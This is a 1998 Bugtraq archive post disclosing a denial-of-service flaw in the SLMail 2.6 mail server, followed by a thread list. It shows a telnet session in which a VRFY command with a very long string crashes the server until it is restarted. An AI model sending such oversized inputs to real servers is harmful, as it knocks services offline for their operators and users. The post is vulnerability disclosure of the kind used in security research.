Bugtraq mailing list archives
SLMail 2.6 DoS
From: steven () EFNI COM (Steven)
Date: Wed, 11 Mar 1998 20:44:56 -0500
Hello, I have recently found a quite serious DoS attack for the SLMail 2.6 email daemon (www.seattlelabs.com/slmail). A long string of text after a command makes the program crash. I have only tested this on 2.6, so I'm not sure if other versions are vulnerable. craphole:~$ telnet www.victim.com 25 Trying 555.55.555.55... Connected to www.victim.com. Escape character is '^]'. 220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here vrfy dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd Connection closed by foreign host. craphole:~$ telnet www.victim.com 25 Trying 555.55.555.55... telnet: Unable to connect to remote host: Connection refused craphole:~$ It will stay unresponsive until manually restarted. I haven't mailed Seattle Labs about this, but I'm sure they'll figure it out. Later, Cisc0 @ Undernet steven () efni com
Current thread:
- Re: /tmp event logger, (continued)
- Re: /tmp event logger Theo de Raadt (Mar 15)
- Vunerable shell scripts Michal Zalewski (Mar 14)
- More broadcast fun T. Freak (Mar 14)
- Midnight Commander /tmp race Michal Zalewski (Mar 15)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 17)
- Re: Midnight Commander /tmp race willy () SNOWYOWL CSU AC RU (Mar 17)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 18)
- Solaris printd security vulnerability Aleph One (Mar 11)
- Sun Security Bulletin #00165 Aleph One (Mar 11)
- Fwd: Sun Security Bulletin #00166 Tony Hagale (Mar 11)
- SLMail 2.6 DoS Steven (Mar 11)
- SLMail 2.6 DoS - Imail also Jon (Mar 11)
- Winsock 2.0 DoS John Robinson (Mar 11)
- Re: Winsock 2.0 DoS Henri Karrenbeld (Mar 12)
- more testing of Winsock 2.0 DoS Velocet (Mar 12)
- Re: Winsock 2.0 DoS stevep () ee pdx edu (Mar 12)
- InfoSecurity News jericho () DIMENSIONAL COM (Mar 13)
- Chase Bank joey.wheel (Mar 13)
- Win95 Winsock 2.0 DoS Russ (Mar 13)
- Problems with MDaemon 2.7.1 Development Team (Mar 12)
- FreeBSD Security Advisory: FreeBSD-SA-98:01.land Aleph One (Mar 12)